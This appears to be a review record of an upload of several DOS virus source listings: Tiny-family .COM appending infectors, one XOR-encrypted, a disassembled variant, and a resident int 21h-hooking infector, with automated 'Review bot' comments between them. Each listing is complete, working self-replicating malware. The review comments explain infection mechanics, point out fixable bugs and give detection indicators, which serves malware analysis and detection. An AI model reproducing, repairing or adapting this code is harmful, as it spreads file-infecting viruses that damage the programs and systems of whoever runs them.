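+tinyv SEGMENT BYTE PUBLIC 'code'
+ASSUME CS:tinyv
+ASSUME SS:tinyv
+ASSUME DS:tinyv
+H00000 DB 0
+H00001 DB 255 DUP(?)
+program PROC FAR
+ASSUME ES:tinyv
+begin:
+JMP pgstart ; start program
+exlbl LABEL BYTE
+db 0CDh, 20h, 7, 8, 9
+pgstart:
+CALL tinyvir
+mnprg PROC NEAR
+tinyvir:
+POP SI ; get SI for storage
+SUB SI,offset tinyvir ; reset SI to virus start
+MOV BP,[SI+blnkdat] ; store SI in BP for return
+ADD BP,offset exlbl ; Add to get original offset
+LEA DX,[SI+fspec] ; get filespec (*.COM)
+SUB CX,CX ; || (clear regs)
+MOV AH,4EH ; || (find files)
+mainloop: ; \||/
+INT 21H ; ----\/----
+JC ack ; no more files found, terminate virus
+MOV DX,009EH ; set file name pointer
+MOV AX,3D02H ; open file
+INT 21H ; do it!
+MOV BX,AX ; move file handle to BX
+MOV AH,3FH ; read file
+JMP whatever
+ack:
+JMP nofile
+whatever:
+LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
+MOV DI,DX ; set Dest Index to area for buffer (?)
+MOV CX,0003H ; read 3 bytes
+INT 21H ; do it!
+CMP BYTE PTR [DI],0E9H ; check for JMP at start
+JE infect ; If begins w/JMP, Infect
+nextfile:
+MOV AH,4FH ; set int 21 to find next file
+JMP mainloop ; next file, do it!
+infect:
+MOV DX,[DI+01H] ; set # of bytes to move
+MOV [SI+blnkdat],DX ; " " " " " "
+SUB CX,CX ; " " " " " " (0 here)
+NOP
+MOV AX,4200H ; move file
+INT 21H ; do it!
+MOV DX,DI ; set dest index to area for buffer (?)
+MOV CX,0002H ; two bytes
+NOP
+MOV AH,3FH ; read file
+INT 21H ; do it!
+CMP WORD PTR [DI],0807H ; check for infection
+JE nextfile ; next file if infected
+NOP
+SUB DX,DX ; clear regs
+SUB CX,CX ; " "
+MOV AX,4202H ; move file pointer
+INT 21H ; do it!
+CMP DX,00H ; new pointer location 0?
+NOP
+JNE nextfile ; if no then next file
+CMP AH,0FEH ; new pointer loc too high?
+JNC nextfile ; yes, try again
+MOV [SI+offset endprog+3],AX; point to data
+NOP
+MOV AH,40H ; write instruction
+LEA DX,[SI+0105H] ; write buffer loc |
+MOV CX,offset endprog-105h ; (size of virus) --\|/--
+INT 21H ; do it!
+JC exit ; error, bug out
+MOV AX,4200H ; move pointer
+NOP
+SUB CX,CX ; clear reg
+MOV DX,OFFSET H00001 ; where to set pointer
+NOP
+INT 21H ; do it!
+MOV AH,40H ; write to file
+LEA DX,[SI+offset endprog+3]; write data at SI+1AB
+NOP
+MOV CX,0002H ; two bytes (the JMP)
+INT 21H ; do it!
+exit:
+MOV AH,3EH ; close file
+INT 21H ; do it!
+nofile:
+JMP BP ; go to original file
+mnprg ENDP
+program ENDP
+blnkdat LABEL WORD
+DW 0000H
+fspec LABEL WORD
+DB '*.COM'
+DB 0
+endprog LABEL WORD
+tinyv ENDS
+END program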
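Review bot: Several comments describe the wrong thing: `MOV BP,[SI+blnkdat] ; store SI in BP for return` actually loads the host's original JMP displacement that `infect:` saved into the image (`MOV DX,[DI+01H]` / `MOV [SI+blnkdat],DX`) before the image was appended, and `ADD BP,offset exlbl` turns it into the host's original entry, which `nofile: JMP BP` then enters; `; set # of bytes to move` on `MOV DX,[DI+01H]` is likewise the target's JMP operand, not a byte count, and `MOV [SI+offset endprog+3],AX ; point to data` stores the file length that becomes the new JMP operand written back at offset 1. I would rewrite them as `; BP = host's original JMP target (saved displacement + 103h)`, `; DX = target's current JMP displacement; stored in the image so the next generation can return to it`, and `; AX = file length = new JMP displacement, written at offset 1 below`. `MOV DX,OFFSET H00001` is just the constant 1 (the JMP operand's offset), which also deserves saying. As in the other Tiny listings, the open result is moved to BX with no carry test.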
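--- a/TINYV2.ASM
+++ b/TINYV2.ASM
@@ -0,0 +1,101 @@
+PAGE ,132
+tinyv SEGMENT BYTE PUBLIC 'code'
+ASSUME CS:tinyv
+ASSUME SS:tinyv
+ASSUME DS:tinyv
+H00000 DB 0
+H00001 DB 255 DUP(?)
+program PROC FAR
+ASSUME ES:tinyv
+begin:
+JMP pgstart ; start program
+exlbl LABEL BYTE
+db 0CDh, 20h, 7, 8, 9
+pgstart:
+CALL tinyvir
+mnprg PROC NEAR
+tinyvir:
+POP SI ; get SI for storage
+SUB SI,offset tinyvir ; reset SI to virus start
+MOV BP,[SI+blnkdat] ; store SI in BP for return
+ADD BP,offset exlbl ; Add to get original offset
+
+LEA DX,[SI+fspec] ; get filespec (*.COM)
+SUB CX,CX ; || (clear regs)
+MOV AH,4EH ; || (find files)
+mainloop: ; \||/
+INT 21H ; ----\/----
+JC hiccup ; no more files found, terminate virus
+MOV DX,009EH ; set file name pointer
+MOV AX,3D02H ; open file
+INT 21H ; do it!
+MOV BX,AX ; move file handle to BX
+MOV AH,3FH ; read file
+LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
+MOV DI,DX ; set Dest Index to area for buffer (?)
+MOV CX,0003H ; read 3 bytes
+INT 21H ; do it!
+CMP BYTE PTR [DI],0E9H ; check for JMP at start
+JE infect ; If begins w/JMP, Infect
+nextfile:
+MOV AH,4FH ; set int 21 to find next file
+JMP mainloop ; next file, do it!
+hiccup: JMP nofile
+infect:
+MOV AX,5700h ; get date function
+INT 21h ; do it!
+PUSH DX ; store date + time
+PUSH CX
+MOV DX,[DI+01H] ; set # of bytes to move
+MOV [SI+blnkdat],DX ; " " " " " "
+SUB CX,CX ; " " " " " " (0 here)
+MOV AX,4200H ; move file
+INT 21H ; do it!
+MOV DX,DI ; set dest index to area for buffer (?)
+MOV CX,0002H ; two bytes
+MOV AH,3FH ; read file
+INT 21H ; do it!
+CMP WORD PTR [DI],0807H ; check for infection
+JE nextfile ; next file if infected
+SUB DX,DX ; clear regs
+SUB CX,CX ; " "
+MOV AX,4202H ; move file pointer
+INT 21H ; do it!
+CMP DX,00H ; new pointer location 0?
+JNE nextfile ; if no then next file
+CMP AH,0FEH ; new pointer loc too high?
+JNC nextfile ; yes, try again
+MOV [SI+offset endprog+3],AX; point to data
+MOV AH,40H ; write instruction
+LEA DX,[SI+0105H] ; write buffer loc |
+MOV CX,offset endprog-105h ; (size of virus) --\|/--
+INT 21H ; do it!
+JC exit ; error, bug out
+MOV AX,4200H ; move pointer
+SUB CX,CX ; clear reg
+MOV DX,OFFSET H00001 ; where to set pointer
+INT 21H ; do it!
+MOV AH,40H ; write to file
+LEA DX,[SI+offset endprog+3]; write data at SI+1AB
+MOV CX,0002H ; two bytes (the JMP)
+INT 21H ; do it!
+MOV AX,5701h ; store date
+POP CX ; restore time
+POP DX ; restore date
+INT 21h ; do it!
+exit:
+MOV AH,3EH ; close file
+INT 21H ; do it!
+nofile:
+
+JMP BP ; go to original file
+mnprg ENDP
+program ENDP
+blnkdat LABEL WORD
+DW 0000H
+fspec LABEL WORD
+DB '*.COM'
+DB 0
+endprog LABEL WORD
+tinyv ENDS
+END program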
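Review bot: The date/time words pushed at `infect:` (`PUSH DX` / `PUSH CX` after `MOV AX,5700h`) are popped only on the successful-write path in front of `MOV AX,5701h`; every branch to `nextfile` taken after them (`JE nextfile` on the 0807h marker, `JNE nextfile` and `JNC nextfile` on the size test) and the `JC exit` on write failure leave both words behind, so after a directory with skipped E9-prefixed files the host is entered via `JMP BP` with the stack shifted by two words per skipped file. This is a defect the timestamp handling introduced relative to the previous listing, and it deserves a comment at `infect:`: `; NOTE: CX/DX pushed here are popped only on the successful write path; every skipped or failed file leaves 2 words on the stack`. `MOV AX,5700h ; get date function` reads both date and time of the handle in BX, and the `5701h` restore is issued before the close; whether the close then rewrites the restored timestamp is not visible here and should be confirmed against the DOS version in question.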
@ -0,0 +1,182 @@
|
|||
tinyv SEGMENT BYTE PUBLIC 'code'
|
||||
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
|
||||
|
||||
ORG 100h
|
||||
|
||||
DOS EQU 21h
|
||||
|
||||
start: JMP pgstart
|
||||
exlbl: db 0CDh, 20h, 7, 8, 9
|
||||
pgstart:CALL tinyvir
|
||||
tinyvir:
|
||||
POP SI ; get SI for storage
|
||||
SUB SI,offset tinyvir ; reset SI to virus start
|
||||
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
||||
ADD BP, OFFSET exlbl
|
||||
CALL endecrpt
|
||||
JMP SHORT realprog
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; nonencrypted subroutines start here
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
; PCM's encryption was stupid, mine is better - Dark Angel
|
||||
endecrpt:
|
||||
; Only need to save necessary registers - Dark Angel
|
||||
PUSH AX ; store registers
|
||||
PUSH BX
|
||||
PUSH CX
|
||||
PUSH SI
|
||||
; New, better, more compact encryption engine
|
||||
MOV BX, [SI+EN_VAL]
|
||||
ADD SI, offset realprog
|
||||
MOV CX, endenc - realprog
|
||||
SHR CX, 1
|
||||
JNC start_encryption
|
||||
DEC SI
|
||||
start_encryption:
|
||||
MOV DI, SI
|
||||
encloop:
|
||||
LODSW ; DS:[SI] -> AX
|
||||
XOR AX, BX
|
||||
STOSW
|
||||
LOOP encloop
|
||||
|
||||
POP SI ; restore registers
|
||||
POP CX
|
||||
POP BX
|
||||
POP AX
|
||||
RET
|
||||
;-----end of encryption routine
|
||||
nfect:
|
||||
CALL endecrpt
|
||||
MOV [SI+offset endprog+3],AX; point to data
|
||||
MOV AH,40H ; write instruction
|
||||
LEA DX,[SI+0105H] ; write buffer loc |
|
||||
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
||||
INT DOS ; do it!
|
||||
PUSHF
|
||||
CALL endecrpt
|
||||
POPF
|
||||
JC outa1 ; error, bug out
|
||||
RET
|
||||
outa1:
|
||||
JMP exit
|
||||
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Unencrypted routines end here
|
||||
;-----------------------------------------------------------------------------
|
||||
realprog:
|
||||
CLD ; forward direction for string ops
|
||||
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
|
||||
; Instead, set DTA to SI+ENDPROG+131h
|
||||
MOV AH, 1Ah ; Set DTA
|
||||
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
|
||||
INT 21h
|
||||
|
||||
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
||||
XOR CX, CX ; || (clear regs)
|
||||
MOV AH,4EH ; || (find files)
|
||||
mainloop: ; \||/
|
||||
INT DOS ; ----\/----
|
||||
JC hiccup ; no more files found, terminate virus
|
||||
; Next part had to be changed to account for new DTA address - Dark Angel
|
||||
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
|
||||
; (offset 30 is DTA filename start)
|
||||
MOV AX,3D02H ; open file
|
||||
INT DOS ; do it!
|
||||
MOV BX,AX ; move file handle to BX
|
||||
MOV AH,3FH ; read file
|
||||
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
||||
MOV DI,DX ; set Dest Index to area for buffer
|
||||
MOV CX,0003H ; read 3 bytes
|
||||
INT DOS ; do it!
|
||||
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
||||
JE infect ; If begins w/JMP, Infect
|
||||
nextfile:
|
||||
MOV AH,4FH ; set int 21 to find next file
|
||||
JMP mainloop ; next file, do it!
|
||||
hiccup: JMP exit
|
||||
infect:
|
||||
MOV AX,5700h ; get date function
|
||||
INT DOS ; do it!
|
||||
PUSH DX ; store date + time
|
||||
PUSH CX
|
||||
MOV DX,[DI+01H] ; set # of bytes to move
|
||||
MOV [SI+blnkdat],DX ; " " " " " "
|
||||
; Tighter Code here - Dark Angel
|
||||
XOR CX,CX ; " " " " " " (0 here)
|
||||
MOV AX,4200H ; move file
|
||||
INT DOS ; do it!
|
||||
MOV DX,DI ; set dest index to area for buffer
|
||||
MOV CX,0002H ; two bytes
|
||||
MOV AH,3FH ; read file
|
||||
INT DOS ; do it!
|
||||
CMP WORD PTR [DI],0807H ; check for infection
|
||||
JE nextfile ; next file if infected
|
||||
getaval: ; encryption routine starts here
|
||||
; My modifications here - Dark Angel
|
||||
MOV AH, 2Ch ; DOS get TIME function
|
||||
INT DOS ; do it!
|
||||
OR DX, DX ; Is it 0?
|
||||
JE getaval ; yeah, try again
|
||||
MOV word ptr [si+offset en_val], DX ; Store it
|
||||
; Tighter code here - Dark Angel
|
||||
XOR DX,DX ; clear regs
|
||||
XOR CX,CX ; " "
|
||||
MOV AX,4202H ; move file pointer
|
||||
INT DOS ; do it!
|
||||
OR DX,DX ; new pointer location 0?
|
||||
JNE nextfile ; if no then next file
|
||||
CMP AH,0FEH ; new pointer loc too high?
|
||||
JNC nextfile ; yes, try again
|
||||
CALL nfect
|
||||
MOV AX,4200H ; move pointer
|
||||
XOR CX, CX ; clear reg
|
||||
MOV DX,OFFSET 00001 ; where to set pointer
|
||||
INT DOS ; do it!
|
||||
MOV AH,40H ; write to file
|
||||
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
|
||||
MOV CX,0002H ; two bytes (the JMP)
|
||||
INT DOS ; do it!
|
||||
MOV AX,5701h ; store date
|
||||
POP CX ; restore time
|
||||
POP DX ; restore date
|
||||
INT DOS ; do it!
|
||||
exit:
|
||||
MOV AH,3EH ; close file
|
||||
INT DOS ; do it!
|
||||
|
||||
; Return DTA to old position - Dark Angel
|
||||
|
||||
MOV AH, 1Ah ; Set DTA
|
||||
MOV DX, 80h ; to PSP DTA
|
||||
INT 21h
|
||||
|
||||
JMP BP
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; encrypted data goes here
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
fspec LABEL WORD
|
||||
DB '*.COM',0
|
||||
nondata DB 'Tiny-F version 1.1' ; Program identification
|
||||
DB '˜€×@&î·³½ë' ; author identification
|
||||
DB 'Released 10-19-91' ; release date
|
||||
endenc LABEL BYTE ; end of encryption zone
|
||||
;-----------------------------------------------------------------------------
|
||||
; nonencrypted data goes anywhere after here
|
||||
;-----------------------------------------------------------------------------
|
||||
|
||||
blnkdat LABEL WORD
|
||||
DW 0000H
|
||||
|
||||
; Only en_val is needed now because of new encryption mechanism
|
||||
en_val DW 0h
|
||||
|
||||
endprog LABEL WORD
|
||||
tinyv ENDS
|
||||
END start
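Review bot: `MOV DX,OFFSET 00001` at the `; where to set pointer` line applies OFFSET to a bare numeral, whereas the Tiny-D listing in this same upload reads `MOV DX,OFFSET H00001` against a label placed at offset 1 and the disassembly shows `mov dx,1`, so as transcribed it is at best assembler-dependent and deserves `; NOTE(review): transcription differs from Tiny-D (OFFSET H00001) and from the disassembly (mov dx,1)` rather than a silent fix. Also worth a comment at `nondata`: the `Tiny-F version 1.1` string, the author bytes and the `*.COM` mask all sit inside the `realprog`..`endenc` zone XORed with the DX value returned by the get-time call, so none of them is a plaintext signature; the stable bytes are the prologue and the `endecrpt` LODSW / `XOR AX, BX` / STOSW loop. The body is written from `SI+0105H`, so an infected file's jump target starts with `07 08 09` and then the CALL, and the `CMP WORD PTR [DI],0807H` re-infection test assumes the file opens with an E9 whose displacement equals the original file size as stored by `MOV [SI+offset endprog+3],AX`. This is live self-replicating code and the listing should carry a header line stating that it is to be assembled only inside an isolated, non-networked lab VM.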
|
||||
|
|
@ -0,0 +1,120 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ S ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 4-Aug-90 ÛÛ
|
||||
;ÛÛ Version: ÛÛ
|
||||
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_2e equ 1ABh ; (946E:01AB=0)
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
s proc far
|
||||
|
||||
start:
|
||||
jmp loc_1 ; (0108)
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
loc_1:
|
||||
call sub_1 ; (010B)
|
||||
|
||||
s endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
pop si
|
||||
sub si,10Bh
|
||||
mov bp,data_1[si] ; (946E:01A0=0)
|
||||
add bp,103h
|
||||
lea dx,[si+1A2h] ; Load effective addr
|
||||
xor cx,cx ; Zero register
|
||||
mov ah,4Eh ; 'N'
|
||||
loc_2:
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match @ds:dx
|
||||
jc loc_6 ; Jump if carry Set
|
||||
mov dx,9Eh
|
||||
mov ax,3D02h
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
lea dx,[si+1A8h] ; Load effective addr
|
||||
mov di,dx
|
||||
mov cx,3
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
cmp byte ptr [di],0E9h
|
||||
je loc_4 ; Jump if equal
|
||||
loc_3:
|
||||
mov ah,4Fh ; 'O'
|
||||
jmp short loc_2 ; (0120)
|
||||
loc_4:
|
||||
mov dx,[di+1]
|
||||
mov data_1[si],dx ; (946E:01A0=0)
|
||||
xor cx,cx ; Zero register
|
||||
mov ax,4200h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov dx,di
|
||||
mov cx,2
|
||||
mov ah,3Fh ; '?'
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
cmp word ptr [di],807h
|
||||
je loc_3 ; Jump if equal
|
||||
xor dx,dx ; Zero register
|
||||
xor cx,cx ; Zero register
|
||||
mov ax,4202h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
cmp dx,0
|
||||
jne loc_3 ; Jump if not equal
|
||||
cmp ah,0FEh
|
||||
jae loc_3 ; Jump if above or =
|
||||
mov ds:data_2e[si],ax ; (946E:01AB=0)
|
||||
mov ah,40h ; '@'
|
||||
lea dx,[si+105h] ; Load effective addr
|
||||
mov cx,0A3h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
jc loc_5 ; Jump if carry Set
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,1
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
lea dx,[si+1ABh] ; Load effective addr
|
||||
mov cx,2
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
loc_5:
|
||||
mov ah,3Eh ; '>'
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
loc_6:
|
||||
jmp bp ;*Register jump
|
||||
data_1 dw 0 ; Data table (indexed access)
|
||||
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
|
||||
sub_1 endp
|
||||
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
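Review bot: This listing has no identifying header beyond the disassembler banner, yet it is a complete infector: `mov cx,0A3h` fixes the appended body at 163 bytes, `mov dx,9Eh` shows the matched file name is taken from the default PSP DTA at 80h+1Eh, and `cmp word ptr [di],807h` is the re-infection test on the two bytes at the host's JMP displacement; the same `0CDh, 20h, 7, 8, 9` stub and `807h` check appear in the Tiny-D source elsewhere in this upload. I would add a header such as `; Tiny-family .COM appender: 163-byte body, marker 07 08 at the JMP target, uses the default DTA at PSP:80h, mask '*.COM' (bytes 2A 2E 43 4F 4D 00)` so the file is usable for detection work. The `(946E:01A0=0)` annotations are addresses from the disassembler's load session and should be marked as such so nobody reads them as file offsets. Note too that `sub_1` never issues a set-DTA call, so at `jmp bp` the host starts with its command tail at PSP:80h replaced by find-first data, which is a behavioral indicator worth recording.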
|
|
@ -0,0 +1,94 @@
|
|||
VSize=085h
|
||||
|
||||
Code Segment
|
||||
Assume CS:Code
|
||||
org 0
|
||||
db 4Dh
|
||||
jmp Start
|
||||
|
||||
Org 600h
|
||||
|
||||
Bytes db 0CDh,20h,90h,90h
|
||||
|
||||
Start: mov si, 0100h
|
||||
mov bx, offset Int21
|
||||
mov cx, 0050h
|
||||
mov di, si
|
||||
add si, [si+2]
|
||||
push di
|
||||
movsw
|
||||
movsw
|
||||
mov es, cx
|
||||
cmpsb
|
||||
je StartFile
|
||||
dec si
|
||||
dec di
|
||||
rep movsw
|
||||
mov es, cx
|
||||
xchg ax, bx
|
||||
xchg ax, cx
|
||||
Loop0: xchg ax, cx
|
||||
xchg ax, word ptr es:[di-120h]
|
||||
stosw
|
||||
jcxz Loop0
|
||||
xchg ax, bx
|
||||
StartFile:
|
||||
push ds
|
||||
pop es
|
||||
ret
|
||||
|
||||
Int21: cmp ax, 4B00h
|
||||
jne End21
|
||||
Exec: push ax
|
||||
push bx
|
||||
push dx
|
||||
push ds
|
||||
push es
|
||||
mov ax, 3D02h
|
||||
call DoInt21
|
||||
jc EndExec
|
||||
cbw ;Zero AH
|
||||
cwd ;Zero DX
|
||||
mov bx, si ;Move handle to BX
|
||||
mov ds, ax ;Set DS and ES to 60h,
|
||||
mov es, ax ;the virus data segment
|
||||
mov ah, 3Fh ;Read first 4 bytes
|
||||
int 69h
|
||||
mov al, 4Dh
|
||||
scasb ;Check for 4D5Ah or infected file mark
|
||||
je Close ;.EXE or already infected
|
||||
mov al, 2
|
||||
call LSeek ;Seek to the end, SI now contains file size
|
||||
mov cl, VSize ;Virus size in CX, prepare to write
|
||||
int 69h ;AH is 40h, i.e. Write operation
|
||||
mov ax, 0E94Dh ;Virus header in AX
|
||||
stosw ;Store it
|
||||
xchg ax, si ;Move file size in AX
|
||||
stosw ;Complete JMP instruction
|
||||
xchg ax, dx ;Zero AX
|
||||
call LSeek ;Seek to the beginning
|
||||
int 69h ;AH is 40h, write the virus header
|
||||
Close: mov ah,3Eh ;Close the file
|
||||
int 69h
|
||||
EndExec: pop es
|
||||
pop ds
|
||||
pop dx
|
||||
pop bx
|
||||
pop ax
|
||||
End21: jmp dword ptr cs:[69h * 4]
|
||||
|
||||
LSeek: mov ah, 42h ;Seek operation
|
||||
cwd ;Zero DX
|
||||
DoInt21: xor cx, cx ;External entry for Open, zero cx
|
||||
int 69h
|
||||
mov cl, 4 ;4 bytes will be read/written
|
||||
xchg ax, si ;Store AX in SI
|
||||
mov ax, 4060h ;Prepare AH for Write
|
||||
xor di, di ;Zero DI
|
||||
ret
|
||||
|
||||
VLen = $ - offset Bytes
|
||||
|
||||
Code EndS
|
||||
End
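Review bot: `VSize=085h` at the top is a hard-coded byte count consumed by `mov cl, VSize` for the append write, while `VLen = $ - offset Bytes` is computed at the end and never referenced, so nothing ties the written length to the assembled length; a comment at `VSize` such as `; hard-coded; VLen below is the assembled length and is unused, so do not take VSize as the appended-body size` keeps an analyst from mis-sizing the body. The listing also has no header at all, and what it visibly does is worth stating: on every AX=4B00h EXEC it opens the target, reads 4 bytes into segment 60h, skips files whose first byte is 4Dh (which covers both `MZ` executables and its own `4D E9` mark) and appends itself, keeping a resident image at linear 600h addressed through the `org 600h`. The hook wiring is the detection indicator: by my reading of the register shuffle at `Loop0`, the int 21h vector is pointed into segment 0 and the original int 21h handler is moved into the int 69h slot (`jmp dword ptr cs:[69h * 4]`, `int 69h` throughout), so an int 69h vector resolving to the DOS int 21h entry is the tell. The `scasb` test compares one byte only, so any .COM whose first byte happens to be 'M' is skipped as well.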
|
||||
|
|
@ -0,0 +1,116 @@
|
|||
tinyv SEGMENT BYTE PUBLIC 'code'
|
||||
ASSUME CS:tinyv
|
||||
ASSUME SS:tinyv
|
||||
ASSUME DS:tinyv
|
||||
H00000 DB 0
|
||||
H00001 DB 255 DUP(?)
|
||||
program PROC FAR
|
||||
ASSUME ES:tinyv
|
||||
begin:
|
||||
JMP pgstart ; start program
|
||||
exlbl LABEL BYTE
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
pgstart:
|
||||
CALL tinyvir
|
||||
mnprg PROC NEAR
|
||||
tinyvir:
|
||||
POP SI ; get SI for storage
|
||||
SUB SI,offset tinyvir ; reset SI to virus start
|
||||
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
||||
ADD BP,offset exlbl ; Add to get original offset
|
||||
|
||||
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
||||
SUB CX,CX ; || (clear regs)
|
||||
MOV AH,4EH ; || (find files)
|
||||
mainloop: ; \||/
|
||||
INT 21H ; ----\/----
|
||||
JC hiccup ; no more files found, terminate virus
|
||||
MOV DX,009EH ; set file name pointer
|
||||
MOV AX,3D02H ; open file
|
||||
INT 21H ; do it!
|
||||
MOV BX,AX ; move file handle to BX
|
||||
MOV AH,3FH ; read file
|
||||
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
||||
MOV DI,DX ; set Dest Index to area for buffer (?)
|
||||
MOV CX,0003H ; read 3 bytes
|
||||
INT 21H ; do it!
|
||||
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
||||
JE infect ; If begins w/JMP, Infect
|
||||
nextfile:
|
||||
MOV AH,4FH ; set int 21 to find next file
|
||||
JMP mainloop ; next file, do it!
|
||||
hiccup: JMP nofile
|
||||
infect:
|
||||
MOV AX,5700h ; get date function
|
||||
INT 21h ; do it!
|
||||
PUSH DX ; store date + time
|
||||
PUSH CX
|
||||
MOV DX,[DI+01H] ; set # of bytes to move
|
||||
MOV [SI+blnkdat],DX ; " " " " " "
|
||||
SUB CX,CX ; " " " " " " (0 here)
|
||||
MOV AX,4200H ; move file
|
||||
INT 21H ; do it!
|
||||
MOV DX,DI ; set dest index to area for buffer (?)
|
||||
MOV CX,0002H ; two bytes
|
||||
MOV AH,3FH ; read file
|
||||
INT 21H ; do it!
|
||||
CMP WORD PTR [DI],0807H ; check for infection
|
||||
JE nextfile ; next file if infected
|
||||
SUB DX,DX ; clear regs
|
||||
SUB CX,CX ; " "
|
||||
MOV AX,4202H ; move file pointer
|
||||
INT 21H ; do it!
|
||||
CMP DX,00H ; new pointer location 0?
|
||||
JNE nextfile ; if no then next file
|
||||
CMP AH,0FEH ; new pointer loc too high?
|
||||
JNC nextfile ; yes, try again
|
||||
MOV [SI+offset endprog+3],AX; point to data
|
||||
MOV AH,40H ; write instruction
|
||||
LEA DX,[SI+0105H] ; write buffer loc |
|
||||
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
||||
INT 21H ; do it!
|
||||
JC exit ; error, bug out
|
||||
MOV AX,4200H ; move pointer
|
||||
SUB CX,CX ; clear reg
|
||||
MOV DX,OFFSET H00001 ; where to set pointer
|
||||
INT 21H ; do it!
|
||||
MOV AH,40H ; write to file
|
||||
LEA DX,[SI+offset endprog+3]; write data at SI+1AB
|
||||
MOV CX,0002H ; two bytes (the JMP)
|
||||
INT 21H ; do it!
|
||||
MOV AX,5701h ; store date
|
||||
POP CX ; restore time
|
||||
POP DX ; restore date
|
||||
INT 21h ; do it!
|
||||
exit:
|
||||
MOV AH,2Ah ; date function
|
||||
INT 21h ; do it!
|
||||
CMP AL,0h ; is it sunday?
|
||||
JNE closal ; nope, quit
|
||||
CMP DH,6h ; is it June?
|
||||
JNE closal ; nope, quit
|
||||
PUSH BX
|
||||
PUSH SI
|
||||
MOV AH,9h ; print string
|
||||
MOV DX, OFFSET nondata ; string to print
|
||||
ADD DX,SI
|
||||
INT 21h ; print it
|
||||
MOV DX, OFFSET nondat2 ; next string
|
||||
ADD DX, SI
|
||||
INT 21h ; print it!
|
||||
POP BX
|
||||
closal: MOV AH,3EH ; close file
|
||||
INT 21H ; do it!
|
||||
nofile: JMP BP ; go to original file
|
||||
mnprg ENDP
|
||||
program ENDP
|
||||
blnkdat LABEL WORD
|
||||
DW 0000H
|
||||
fspec LABEL WORD
|
||||
DB '*.COM'
|
||||
DB 0
|
||||
nondata DB 'Tiny-D version 1.1$ '; Program identification
|
||||
nondat2 DB ' by ˜€×@&î·³½ë$' ; author identification
|
||||
endprog LABEL WORD
|
||||
tinyv ENDS
|
||||
END program
